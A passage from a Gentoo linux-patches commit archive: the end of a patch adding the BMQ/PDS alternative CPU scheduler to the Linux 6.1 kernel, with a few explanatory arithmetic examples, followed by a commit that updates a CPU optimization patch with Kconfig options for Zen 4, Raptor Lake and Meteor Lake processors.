+ };
+ 
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+ 
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+ 
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+ 
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ static struct dentry *debugfs_sched;
+ 
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+ 
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+ 
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+ 
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
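
A worked example of sched_renew_deadline() above, not part of the patch and assuming the mainline values MAX_PRIO == 140 and NICE_WIDTH == 40, so the added term reduces to static_prio - 100; with the default shift of 22, one unit of rq->clock >> 22 is roughly 4.19 ms:

    #include <stdio.h>

    #define MAX_PRIO   140	/* assumed mainline values */
    #define NICE_WIDTH  40

    /* Same arithmetic as sched_renew_deadline() above. */
    static unsigned long long renew_deadline(unsigned long long clock_ns,
    					 int static_prio, int shift)
    {
    	return (clock_ns >> shift) + static_prio - (MAX_PRIO - NICE_WIDTH);
    }

    int main(void)
    {
    	unsigned long long now = 1ULL << 30;	/* some rq->clock value */

    	printf("%llu %llu\n",
    	       renew_deadline(now, 100, 22),	/* nice -20: now' + 0  */
    	       renew_deadline(now, 120, 22));	/* nice   0: now' + 20 */
    	return 0;
    }

A nice +19 task would get now' + 39, i.e. the nicer the task, the further its virtual deadline, which is how PDS orders normal tasks.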
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
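
The rotation above is easiest to see with concrete numbers. A simplified sketch, not part of the patch and assuming NORMAL_PRIO_NUM == 64 as defined elsewhere in the patch: the normal-priority queues form a ring indexed by time_edge modulo NORMAL_PRIO_NUM, and expired slots get spliced onto the slot for "now":

    #include <stdio.h>

    #define NORMAL_PRIO_NUM 64	/* assumed value, defined elsewhere in the patch */

    int main(void)
    {
    	unsigned long long old = 100, now = 103;
    	unsigned long long delta = now - old;	/* real code caps this at NORMAL_PRIO_NUM */

    	/* Slots whose time has passed all collapse into the "now" slot. */
    	for (unsigned long long t = old; t < old + delta; t++)
    		printf("splice slot %llu into slot %llu\n",
    		       t % NORMAL_PRIO_NUM, now % NORMAL_PRIO_NUM);
    	return 0;
    }

Here slots 36, 37 and 38 are spliced into slot 39; the bitmap shift in the real code drops the same three expired bits in one operation.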
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ 
+ 	return 0;
+ }
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+ 
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+ 
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #else
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+ 
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586..c363693cd869 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+ 
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+ 
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9..53934e7ef5db 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+ 
+ #endif /* CONFIG_SCHEDSTATS */
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+ 
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+ 
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+ 
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+ 
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+ 
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index c6d9dec11b74..2bc42ce8b48e 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+ 
+ /* Constants used for minimum and maximum */
+ 
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
+ }
+ 
+ static struct ctl_table kern_table[] = {
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA_BALANCING
+ 	{
+ 		.procname	= "numa_balancing",
+@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 	},
+ #endif /* CONFIG_NUMA_BALANCING */
++#endif /* !CONFIG_SCHED_ALT */
+ 	{
+ 		.procname	= "panic",
+ 		.data		= &panic_timeout,
+@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+ 
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+ 
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+ 
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+ 
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+ 
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+ 
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+ 
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index a2d301f58ced..2ccdede8585c 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-16 19:44 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-16 19:44 UTC (permalink / raw
  To: gentoo-commits

commit:     13932c5603ee74cb23015e86fe92af652c8cad09
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec 16 19:43:32 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec 16 19:43:32 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=13932c56

Update CPU optimization patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 217 +++++++++++++++++++-------
 1 file changed, 159 insertions(+), 58 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index b9c03cb6..0841340b 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,10 +1,7 @@
-From b5892719c43f739343c628e3d357471a3bdaa368 Mon Sep 17 00:00:00 2001
-From: graysky <graysky@archlinux.us>
-Date: Tue, 15 Mar 2022 05:58:43 -0400
+From a0825feea3f100656d58446885b5f190284fd219
+From: graysky <therealgraysky@proton.me>
+Date: Fri, 4 Nov 2022 15:34:36 -0400
 Subject: [PATCH] more uarches for kernel 5.17+
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -36,6 +33,7 @@ CPU-specific microarchitectures include:
 • AMD Family 17h (Zen)
 • AMD Family 17h (Zen 2)
 • AMD Family 19h (Zen 3)†
+• AMD Family 19h (Zen 4)§
 • Intel Silvermont low-power processors
 • Intel Goldmont low-power processors (Apollo Lake and Denverton)
 • Intel Goldmont Plus low-power processors (Gemini Lake)
@@ -55,11 +53,14 @@ CPU-specific microarchitectures include:
 • Intel 3rd Gen 10nm++ Xeon (Sapphire Rapids)‡
 • Intel 11th Gen i3/i5/i7/i9-family (Rocket Lake)‡
 • Intel 12th Gen i3/i5/i7/i9-family (Alder Lake)‡
+• Intel 13th Gen i3/i5/i7/i9-family (Raptor Lake)§
+• Intel 14th Gen i3/i5/i7/i9-family (Meteor Lake)§
 
 Notes: If not otherwise noted, gcc >=9.1 is required for support.
        *Requires gcc >=10.1 or clang >=10.0
        †Required gcc >=10.3 or clang >=12.0
        ‡Required gcc >=11.1 or clang >=12.0
+       §Required gcc >=13.0 or clang >=15.0.5
 
 It also offers to compile passing the 'native' option which, "selects the CPU
 to generate code for at compilation time by determining the processor type of
@@ -99,20 +100,19 @@ REFERENCES
 4.  https://github.com/graysky2/kernel_gcc_patch/issues/15
 5.  http://www.linuxforge.net/docs/linux/linux-gcc.php
 
-Signed-off-by: graysky <graysky@archlinux.us>
 ---
- arch/x86/Kconfig.cpu            | 332 ++++++++++++++++++++++++++++++--
- arch/x86/Makefile               |  40 +++-
- arch/x86/include/asm/vermagic.h |  66 +++++++
- 3 files changed, 424 insertions(+), 14 deletions(-)
+ arch/x86/Kconfig.cpu            | 416 ++++++++++++++++++++++++++++++--
+ arch/x86/Makefile               |  43 +++-
+ arch/x86/include/asm/vermagic.h |  72 ++++++
+ 3 files changed, 514 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..22b919cdb6d1 100644
+index 542377cd419d..08d887d1220d 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
- 
- 
+
+
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -121,16 +121,16 @@ index 542377cd419d..22b919cdb6d1 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
- 
+
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
  	depends on X86_32
  	help
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
-@@ -173,12 +173,98 @@ config MK7
+@@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
- 
+
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -138,7 +138,7 @@ index 542377cd419d..22b919cdb6d1 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
- 
+
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -224,32 +224,40 @@ index 542377cd419d..22b919cdb6d1 100644
 +	  Select this for AMD Family 19h Zen 3 processors.
 +
 +	  Enables -march=znver3
++
++config MZEN4
++	bool "AMD Zen 4"
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	help
++	  Select this for AMD Family 19h Zen 4 processors.
++
++	  Enables -march=znver4
 +
  config MCRUSOE
  	bool "Crusoe"
  	depends on X86_32
-@@ -270,7 +356,7 @@ config MPSC
+@@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
- 
+
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
- 
+
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
-@@ -278,6 +364,8 @@ config MCORE2
+@@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
- 
+
 +	  Enables -march=core2
 +
  config MATOM
  	bool "Intel Atom"
  	help
-@@ -287,6 +375,182 @@ config MATOM
+@@ -287,6 +383,202 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
- 
+
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -425,14 +433,34 @@ index 542377cd419d..22b919cdb6d1 100644
 +	  Select this for twelfth-generation processors in the Alder Lake family.
 +
 +	  Enables -march=alderlake
++
++config MRAPTORLAKE
++	bool "Intel Raptor Lake"
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for thirteenth-generation processors in the Raptor Lake family.
++
++	  Enables -march=raptorlake
++
++config MMETEORLAKE
++	bool "Intel Meteor Lake"
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for fourteenth-generation processors in the Meteor Lake family.
++
++	  Enables -march=meteorlake
 +
  config GENERIC_CPU
  	bool "Generic-x86-64"
  	depends on X86_64
-@@ -294,6 +558,50 @@ config GENERIC_CPU
+@@ -294,6 +586,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
- 
+
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -478,68 +506,133 @@ index 542377cd419d..22b919cdb6d1 100644
 +	  Enables -march=native
 +
  endchoice
- 
+
  config X86_GENERIC
-@@ -318,7 +626,7 @@ config X86_INTERNODE_CACHE_SHIFT
+@@ -318,9 +654,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
  	int
  	default "7" if MPENTIUM4 || MPSC
 -	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || X86_GENERIC || GENERIC_CPU
